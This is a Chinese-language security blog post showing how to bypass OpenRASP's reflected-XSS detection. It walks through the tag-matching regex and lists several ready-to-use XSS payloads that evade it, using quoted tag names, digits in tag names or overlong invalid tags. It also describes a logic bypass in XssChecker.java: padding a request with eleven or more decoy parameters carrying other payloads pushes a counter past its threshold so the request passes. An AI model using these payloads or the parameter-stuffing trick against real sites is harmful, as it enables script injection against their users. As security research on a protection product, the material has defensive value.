openrasp默认只能检测反射型XSS,存储型XSS仅IAST商业版支持。对于反射型xss,openrasp也只能检测可控输出点在html标签外的情况,本文的绕过方法是针对这种情况。如果可控输出点在html标签内,如或 内部,openrasp几乎检测不到。

测试环境

【网安学习资料】

windows / tomcat / jdk1.8 / openrasp 1.3.7-beta

测试环境部署参见https://www.anquanke.com/post/id/241107,或者官网文档。

在official.js中xss_userinput算法默认配置为ignore,修改为block来开启拦截。此时点击官方测试用例中下面链接,即可触发openrasp拦截。

openrasp xss算法

openrasp xss算法有2种。算法1是针对PHP环境,此处不考虑。算法2是用户输入匹配算法,根据注释说明,算法原理是”当用户输入长度超过15,匹配上标签正则,且出现在响应里,直接拦截”。

标签正则含义使用regexper网站解析如下

标签正则从整体上来说匹配两种情况,一是请求参数值中有子字符串以<! 开头的;二是请求参数值中有子字符串以< 开头的。对于第二种情况,标签正则会匹配< 字符后接1到12个大小写字母,再后接/ 或> 或0x00 - 0x20 字符的字符串。所以下面这些常见的xss测试payload都会拦截。

<script>alert(1)</script>         // "<script>"部分匹配标签正则
<img src=1 onerror=alert()>       // "<img "部分匹配正则,空格符对应正则中0x20
<svg/onload=alert()>              //  "<svg/"部分匹配正则
<img src=1 onerror=alert()>触发拦截

标签正则绕过

【网安学习资料】

整理网上的一些xss 绕过payload,发现下面这些可以顺利绕过标签正则

<d3v/onmouseleave=[1].some(confirm)>click
<d3/onmouseenter=[2].find(confirm)>z
<d3"<"/onclick="1>[confirm``]"<">z
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z

浏览器直接输入上面那些xss payload会报400响应错误。对payload进行url编码所有字符。

burpsuite repeater中右键”copy url”,复制url到浏览器中访问,点击即可触发弹框。

[外链图片转存中…(img-d91Hx3yz-1626861607081)]

标签后接单双引号

【网安学习资料】

收集过程中还发现下面这两种xss payload也可以绕过。

<a"/onclick=(confirm)()>click
<a'/onclick=(confirm)()>click

简单测了下其他标签后接单引号或双引号进行绕过,好像蛮多都行的。

<button onclick=alert()>12</button>    // 拦截
<button' onclick=alert()>12</button>   // 点击弹框
<button" onclick=alert()>12</button>   // 点击弹框
<div onclick=alert()>12</div>          // 拦截
<div' onclick=alert()>12</div>         // 点击弹框
<div" onclick=alert()>12</div>         // 点击弹框

例如,使用123<img’ src=1 οnclick=alert()>123 ,url编码后,点击也能弹框。

构造无效标签

【网安学习资料】

这种也可以用于绕过openrasp。看到这种绕过方式,感觉前面的都不香了。

只要构造如下payload即可

<abc1 onclick=confirm()>click here   // 标签名是字母+数字

验证如下

或者

<abcdefabcdefa onclick=confirm()>click here   // 标签名称长度大于12

程序逻辑绕过

【网安学习资料】

还有一种绕过方法,是从程序检测逻辑上进行绕过。

openrasp xss具体检测代码实现在这个文件中agent/java/engine/src/main/java/com/baidu/openrasp/plugin/checker/local/XssChecker.java。下面的一段代码是对”当用户输入长度超过15,匹配上标签正则,且出现在响应里,直接拦截”的具体实现。

但代码中多了一处逻辑。如果请求会传递多个参数,当某个参数值长度大于15,且匹配之前的标签正则<![-[A-Za-z]|<([A-Za-z]{1,12})[/\x00-\x20>] ,如果对应参数值没有在响应中出现时,变量count值会加1。当count值大于10时,openrasp会直接放行。控制程序运行到上面图片中第二个方框中即可产生绕过。

绕过演示

【网安学习资料】

此处为了查看payload内容方便,使用了post请求。如果转换成get请求,并对参数值url编码,效果一样。

原始请求会触发拦截

绕过payload。在input参数前面添加多个input[n]的参数,且参数值为其他xss payload。

转换成get请求,并对payload进行编码。

绕过payload分析

【网安学习资料】

构造的绕过payload有几点要求。一是,虚构的请求参数理论上至少要有11个,如前面input0到input11请求参数。如果没成功,最好在增加几个请求参数。二是,虚构的请求参数名取值有些要求。三是,虚构的请求参数值不能与真实请求参数值相同。

因为这样的话,input0到input11这些请求参数在parameterMap 中会排在input参数前面,见下图。

这样input0到input11这些参数就会优先input请求参数被openrasp检测逻辑处理,从而击中count > exceedLengthCount 的条件进行绕过。

【想学网络安全的同学,上船啦】

OpenRASP xss算法的几种绕过方法相关推荐

  1. 索骥馆-编程语言之《算法引论-一种创造性方法》扫描版[PDF]

    内容介绍: 本书是国际算法大师乌迪·曼博(UdiManber)博士撰写的一本享有盛誉的著作.全书共分12章:第1章到第4章为介绍性内容,涉及数学归纳法.算法分析.数据结构等内容:第5章提出了与归纳证明 ...

  2. C语言学习笔记:(四)算法的5种表示方法

    目录 一.用自然语言表示算法 二.用流程图表示算法 (一)基本概念及简单实例 (二)三种基本结构 三.用N-S图表示算法 四.用伪代码表示算法 五.用计算机语言表示算法 本节所用例题为计算5!. 一. ...

  3. 渗透测试-11种绕过CDN查找真实IP的方法

    11种绕过CDN查找真实IP的测试方法 文章目录 11种绕过CDN查找真实IP的测试方法 验证是否存在CDN 方法1 方法2 绕过 CDN 查找网站真实 IP 查询历史DNS记录 查询子域名 网络空间 ...

  4. 避免图像去雾算法中让天空部分出现过增强的一种简易方法

    FROM:http://www.chawenti.com/articles/25193.html 在经典的几种去雾算法中,包括何凯明的暗通道去雾.Tarel的基于中值滤波的去雾以及一些基于其他边缘保留 ...

  5. 蚁群算法,PSO算法以及两种算法可以融合的几种方法

    蚁群算法(ACO)是受自然界中蚂蚁搜索食物行为的启发,是一种群智能优化算法.它基于对自然界真实蚁群的集体觅食行为的研究,模拟真实的蚁群协作过程.算法由若干个蚂蚁共同构造解路径,通过在解路径上遗留并交换 ...

  6. aes子密钥生成c语言_一种基于流密码算法的子密钥生成方法与流程

    本发明涉及一种用于分组加解密算法的子密钥的生成方法. 背景技术: 随着信息技术的发展,信息安全性的问题却愈来愈显得突出,保证信息安全的一个重要技术就是密码学.密码学在信息安全技术中扮演着基础的角色,是 ...

  7. js实现阶乘算法的三种方法

    js实现阶乘算法的三种方法 // 非递归写法 function f(n) {if (0 === n) {return 1;}let res = 1;for (let i = 1; i <= n; ...

  8. 度量相似性数学建模_一种基于粒子群位置更新思想灰狼优化算法的K-Means文本分类方法与流程...

    技术特征: 1.一种基于粒子群位置更新思想灰狼优化算法的k-means文本分类方法,其特征在于:包括以下步骤: s1:对文本数据进行预处理,得到预处理后文本数据: s2:采用余弦角度为相似性度量,分别 ...

  9. Android P (4)一种绕过Android P上非SDK接口限制的简单方法

    一种绕过Android P上非SDK接口限制的简单方法 众所周知,Android P 引入了 针对非 SDK 接口(俗称为隐藏API)的使用限制.这是继 Android N上 针对 NDK 中私有库的 ...

最新文章

  1. python的matplotlib背景线_python中matplotlib的颜色及线条 控制
  2. Set和存储顺序深入探讨、SortedSet排序的示例
  3. java2的7次方怎么表示_python编程解方程第二弹:10行代码解二次方程(纯字符)...
  4. 【AWSL】之Linux账号和权限管理(/etc/passwd、/etc/shadow、useradd、passwd、usermod、groupadd、gpasswd...chmod、chown)
  5. HTML在手机上实现直接拨打电话以及发送短信
  6. 华为摄像机搜索软件_别人的终点华为的起点!用普惠AI守护城市安全
  7. html5页面主题,HTML5页面开发笔记
  8. 一、android XML资源文件详解 —— 从物理上分析
  9. AI迎来重要发展契机,开发者的机会在哪里?
  10. C#多线程学习1——多线程的相关概念
  11. js转php,js代码转php代码可行吗?
  12. 计算机软件著作权申请条件有哪些
  13. 《科学》最新研究:给“薛定谔猫”第二个盒子会发生什么?
  14. ftp的20 21端口和主动被动模式
  15. 天猫店铺推广怎么收费?还有哪些推广方法?
  16. 42、使用mmrotate中k3det进行旋转目标检测,并进行mnn部署和ncnn部署
  17. Windows 10企业版 LTSC无法手机投屏问题解决
  18. 什么是root?我来告诉你为什么它叫root
  19. step计算机语言,STEP7的三种基本编程语言LAD、FBD及STL 该如何抉择?
  20. Android屏幕解锁图案破解

热门文章

  1. CV之detectron2:detectron2安装过程记录
  2. 成功解决TypeError: Singleton array array('data_input/xgboost/data_RentListingInquries/RentListingInqurie
  3. SQLServer:GUI方式、SQL语句两种方式建立视图和GUI方式设置主键、约束等
  4. MDK_main()代码执行过程分析
  5. 学写网站(一)前端配置之安装nvm、node、npm
  6. 一点点学习PS--实战四
  7. javaweb 要学习的东西
  8. 初识vue+elementUi
  9. solr研磨之facet
  10. 使用自定义的item、Adapter和AsyncTask、第三方开源框架PullToRefresh联合使用实现自定义的下拉列表(从网络加载图片显示在item中的ImageView)...